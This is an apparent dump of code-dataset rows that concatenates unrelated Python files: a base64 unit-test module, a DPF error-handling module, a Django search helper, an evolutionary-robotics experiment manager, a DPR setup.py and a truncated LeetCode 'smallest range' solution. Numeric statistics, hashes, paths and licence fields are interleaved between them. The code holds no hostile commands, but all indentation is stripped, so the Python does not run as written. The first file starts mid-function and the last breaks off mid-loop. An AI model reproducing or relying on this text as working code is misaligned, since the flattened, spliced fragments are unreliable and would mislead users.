# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
| 41.586402
| 83
| 0.570981
| 1,630
| 14,680
| 5.084663
| 0.119632
| 0.072394
| 0.04223
| 0.052365
| 0.65432
| 0.563827
| 0.471646
| 0.379585
| 0.239503
| 0.161438
| 0
| 0.073781
| 0.276158
| 14,680
| 352
| 84
| 41.704545
| 0.706192
| 0.045095
| 0
| 0.239286
| 0
| 0
| 0.194524
| 0.087575
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.078571
| false
| 0
| 0.032143
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136b2299eb41b7ded97c6048734842406f59258d
| 3,437
|
py
|
Python
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 11
|
2021-01-31T15:50:02.000Z
|
2021-10-01T23:15:38.000Z
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 46
|
2021-01-14T05:00:50.000Z
|
2021-10-06T18:30:37.000Z
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 3
|
2021-06-30T07:18:30.000Z
|
2021-09-15T08:43:11.000Z
|
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| 28.882353
| 78
| 0.672971
| 400
| 3,437
| 5.51
| 0.3325
| 0.072595
| 0.089837
| 0.065336
| 0.245463
| 0.132486
| 0.106171
| 0.073503
| 0.03539
| 0
| 0
| 0
| 0.234507
| 3,437
| 118
| 79
| 29.127119
| 0.837704
| 0.21705
| 0
| 0.227273
| 0
| 0
| 0.18955
| 0.010679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.030303
| 0
| 0.393939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136d5996f3e902f896a0d95201a3a98051d0cce2
| 1,553
|
py
|
Python
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | 1
|
2021-06-07T02:14:13.000Z
|
2021-06-07T02:14:13.000Z
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | 9
|
2021-08-14T07:53:47.000Z
|
2022-03-18T19:07:22.000Z
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | null | null | null |
from django.db.models import Q
from hier.search import SearchResult
from .models import app_name, Apart, Meter, Bill, Service, Price
def search(user, query):
result = SearchResult(query)
lookups = Q(name__icontains=query) | Q(addr__icontains=query)
items = Apart.objects.filter(user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'apart', item.id, None, item.name, item.addr, False)
lookups = Q(info__icontains=query)
items = Meter.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(info__icontains=query) | Q(url__icontains=query)
items = Bill.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(name__icontains=query) | Q(abbr__icontains=query)
items = Service.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name)
lookups = Q(info__icontains=query)
items = Price.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name)
return result.items
| 45.676471
| 146
| 0.696072
| 229
| 1,553
| 4.58952
| 0.196507
| 0.106565
| 0.09039
| 0.076118
| 0.640343
| 0.623216
| 0.478592
| 0.478592
| 0.446242
| 0.446242
| 0
| 0
| 0.161623
| 1,553
| 33
| 147
| 47.060606
| 0.80722
| 0
| 0
| 0.269231
| 0
| 0
| 0.023181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136df33d64bf85a2b5e33607c10d78558114c0b0
| 5,884
|
py
|
Python
|
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
import os
import shutil
import numpy as np
from pyrevolve.custom_logging.logger import logger
import sys
class ExperimentManagement:
# ids of robots in the name of all types of files are always phenotype ids, and the standard for id is 'robot_ID'
def __init__(self, settings):
self.settings = settings
manager_folder = os.path.dirname(self.settings.manager)
self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run)
self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution')
self._gen_num = 0
def create_exp_folders(self):
if os.path.exists(self.experiment_folder):
shutil.rmtree(self.experiment_folder)
os.makedirs(self.experiment_folder)
os.mkdir(self.data_folder)
folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness',
'battery', 'phenotype_images', 'failed_eval_robots']
for folder in folders:
os.mkdir(os.path.join(self.data_folder, folder))
@property
def experiment_folder(self):
return self._experiment_folder
@property
def data_folder(self):
return self._data_folder
def export_genotype(self, individual):
if self.settings.recovery_enabled:
individual.export_genotype(self.data_folder)
def export_phenotype(self, individual):
if self.settings.export_phenotype:
individual.export_phenotype(self.data_folder)
def export_fitnesses(self, individuals):
folder = self.data_folder
for individual in individuals:
individual.export_fitness(folder)
def export_fitness(self, individual):
folder = os.path.join(self.data_folder, 'fitness')
individual.export_fitness(folder)
def export_objectives(self, individual):
folder = os.path.join(self.data_folder, 'objectives')
individual.export_objectives(folder)
def export_battery(self, individual):
folder = os.path.join(self.data_folder, 'battery')
individual.export_battery(folder)
def export_behavior_measures(self, _id, measures):
filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')
with open(filename, "w") as f:
if measures is None:
f.write(str(None))
else:
for key, val in measures.items():
f.write(f"{key} {val}\n")
def export_phenotype_images(self, dirpath, individual):
individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png'))
individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png'))
def export_failed_eval_robot(self, individual):
individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf')
def export_snapshots(self, individuals, gen_num):
self._gen_num = gen_num
if self.settings.recovery_enabled:
path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}')
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
for ind in individuals:
self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind)
logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals')
def experiment_is_new(self):
if not os.path.exists(self.experiment_folder):
return True
path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness')))
if len(files) == 0:
return True
else:
return False
def read_recovery_state(self, population_size, offspring_size):
snapshots = []
for r, d, f in os.walk(self.experiment_folder):
for dir in d:
if 'selectedpop' in dir:
exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir)) if os.path.isfile(os.path.join(self.experiment_folder, dir, name))])
if exported_files == (population_size * 2): # body and brain files
snapshots.append(int(dir.split('_')[1]))
if len(snapshots) > 0:
# the latest complete snapshot
last_snapshot = np.sort(snapshots)[-1]
# number of robots expected until the snapshot
n_robots = population_size + last_snapshot * offspring_size
else:
last_snapshot = -1
n_robots = 0
robot_ids = []
for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')):
for file in f:
robot_ids.append(int(file.split('.')[0].split('_')[-1]))
last_id = np.sort(robot_ids)[-1]
# if there are more robots to recover than the number expected in this snapshot
if last_id > n_robots:
# then recover also this partial offspring
has_offspring = True
else:
has_offspring = False
return last_snapshot, has_offspring, last_id+1
def plot_path(self, data_source: str, filename: str, file_extension=".png"):
data_folder = os.path.join(self._data_folder, data_source)
if not os.path.exists(data_folder):
os.mkdir(data_folder)
return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
| 41.730496
| 181
| 0.653977
| 746
| 5,884
| 4.957105
| 0.202413
| 0.040562
| 0.051379
| 0.064359
| 0.296647
| 0.244997
| 0.174148
| 0.140346
| 0.119794
| 0.064089
| 0
| 0.002688
| 0.241332
| 5,884
| 140
| 182
| 42.028571
| 0.825717
| 0.055235
| 0
| 0.111111
| 0
| 0
| 0.103927
| 0.050252
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157407
| false
| 0
| 0.046296
| 0.018519
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136f314f36b3d7d707a24bb2dc1a76fc985f86a7
| 1,079
|
py
|
Python
|
DPR/setup.py
|
sophiaalthammer/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 18
|
2022-01-06T13:03:40.000Z
|
2022-03-29T14:24:23.000Z
|
DPR/setup.py
|
k-for-code/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 1
|
2022-01-20T08:45:19.000Z
|
2022-01-24T05:18:40.000Z
|
DPR/setup.py
|
k-for-code/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 4
|
2021-05-27T08:33:18.000Z
|
2022-02-20T17:45:40.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| 25.690476
| 69
| 0.594995
| 132
| 1,079
| 4.818182
| 0.712121
| 0.031447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033624
| 0.255792
| 1,079
| 41
| 70
| 26.317073
| 0.758406
| 0.176089
| 0
| 0.09375
| 0
| 0
| 0.457014
| 0.054299
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136f33f06908f09a707c44642cdf5eac1e23e341
| 2,817
|
py
|
Python
|
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
输入:[[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
输出: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
